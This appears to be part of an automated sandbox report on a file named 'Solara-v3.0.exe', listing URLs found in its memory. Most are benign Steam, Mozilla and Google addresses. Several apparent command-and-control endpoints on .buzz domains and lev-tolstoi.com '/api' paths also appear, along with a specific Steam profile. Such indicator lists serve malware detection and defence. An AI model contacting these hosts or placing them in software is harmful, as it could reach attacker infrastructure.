                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                    Source: Solara-v3.0.exe, 00000004.00000003.2094435929.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&am
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: Solara-v3.0.exe, 00000004.00000003.2220043538.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2215763251.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193850105.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2219935945.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193758527.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/api
                    Source: Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inherineau.buzz/api
                    Source: Solara-v3.0.exe, 00000004.00000003.2220043538.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2215763251.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193850105.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2219935945.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193758527.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.co
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2880061716.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279860788.0000000003388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2279754011.000000000336A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000002.3287545838.0000000003386000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168563080.0000000005A22000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2169156073.0000000005A22000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000002.3287461223.000000000336F000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279860788.0000000003388000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168880871.0000000005A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                    Source: Solara-v3.0.exe, 00000004.00000003.2168563080.0000000005A22000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2169156073.0000000005A22000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168880871.0000000005A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api2Y61
                    Source: Solara-v3.0.exe, 00000004.00000003.2257643086.0000000003389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiA
                    Source: Solara-v3.0.exe, 00000004.00000003.2094435929.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiP
                    Source: Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiZ
                    Source: Solara-v3.0.exe, 00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiifaf)
                    Source: Solara-v3.0.exe, 00000004.00000003.2257643086.000000000336F000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279754011.000000000336A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000002.3287461223.000000000336F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiinhpmnjffcofjonbfbgaoc
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                    Source: Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/i
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/m
                    Source: Solara-v3.0.exe, 00000004.00000003.2168376117.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2194080227.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168921255.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168753100.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/p
                    Source: Solara-v3.0.exe, 00000004.00000003.2094435929.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                    Source: Solara-v3.0.exe, 00000004.00000002.3288014085.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2233799015.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2880061716.0000000005A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/w
                    Source: Solara-v3.0.exe, 00000004.00000002.3287249240.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz/api0
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Solara-v3.0.exeString found in binary or memory: https://www.entrust.net/rpa0
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
